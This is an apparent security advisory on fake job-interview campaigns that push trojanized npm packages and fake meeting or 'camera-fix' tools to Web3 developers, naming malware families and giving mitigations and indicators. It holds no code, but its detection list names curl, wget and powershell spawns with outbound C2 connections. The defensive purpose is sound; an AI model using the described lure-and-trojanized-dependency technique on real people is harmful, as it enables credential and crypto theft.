Attackers are luring Web3/devs with fake job interviews and “interview software” or coding tests that instruct targets to clone repos and install dependencies. Those dependencies or helper tools are trojanized (malicious NPM packages, “camera-fix” helpers, rogue meeting apps) and deliver info-stealers and backdoors that enable crypto theft, credential exfiltration, and further supply-chain abuse.

Who’s been observed doing this

Research groups attribute large, sophisticated campaigns (often linked to DPRK-aligned groups such as the Lazarus/Contagious-Interview/DeceptiveDevelopment clusters) as well as other financially motivated actors. These operations combine fake recruiter profiles, bespoke “interview” sites/apps, and trojanized open-source packages to get code execution on developer machines.

Tactics, techniques and notable payloads

• Lure: fake recruiter messages, job offers, or interview invites specifically about Web3/blockchain projects. Targets are often asked to take a coding test or “fix” a webcam/meeting app.
• Delivery: malicious helper binaries (fake meeting apps / “camera fix” tools), trojanized NPM packages or other dependencies included in test repos, and links to malicious/interview sites.
• Malware families observed: BeaverTail (loader/downloader), OtterCookie (infostealer/RAT), InvisibleFerret (modular RAT), and other info-stealers/miners/backdoors referenced in reporting.

Why Web3 devs are attractive

• Control over keys, wallets, build/deploy pipelines and package ecosystems (npm, etc.).
• Developers are often asked to run build/install scripts or third-party tools during tests — an ideal vector for code execution.

Practical mitigations (for individual devs and small teams) — do these now

1. Never run unvetted binaries or “camera-fix” helpers. If an interviewer asks you to run a helper, insist on a vetted, signed app or use an isolated environment (ephemeral VM/sandbox).
2. Install packages only from trusted names and pin versions. Inspect package names for typosquatting; prefer lockfiles and verify checksums. Use npm audit, supply-chain scanners and repository allowlists.
3. Use ephemeral, disposable environments for take-home tests (cloud builder, container, remote VM) — never run unknown code on a machine holding wallets or secrets.
4. Protect private keys: keep them in hardware wallets, never on developer machines. Revoke/rotate keys that may have been exposed.
5. Harden auth: require hardware-key MFA for critical accounts, monitor for new logins, and use conditional access where possible.
6. Network and endpoint controls: block known malicious domains, use endpoint detection/EDR with YARA/signature rules for BeaverTail/OtterCookie families, and monitor unusual outbound connections.
7. Vet interview tooling: companies should publish an official list of acceptable meeting apps and interview workflows; recruiters should be verified.

Indicators & detection:

• Requests to npm install unfamiliar packages that are newly published or have suspicious names.
• Unsolicited “interview” domains hosted on transient hosting (Vercel, Netlify) that ask you to download an executable.
• New processes that spawn powershell/curl/wget/npm or create network connections to suspicious C2 hosts shortly after running helper tools.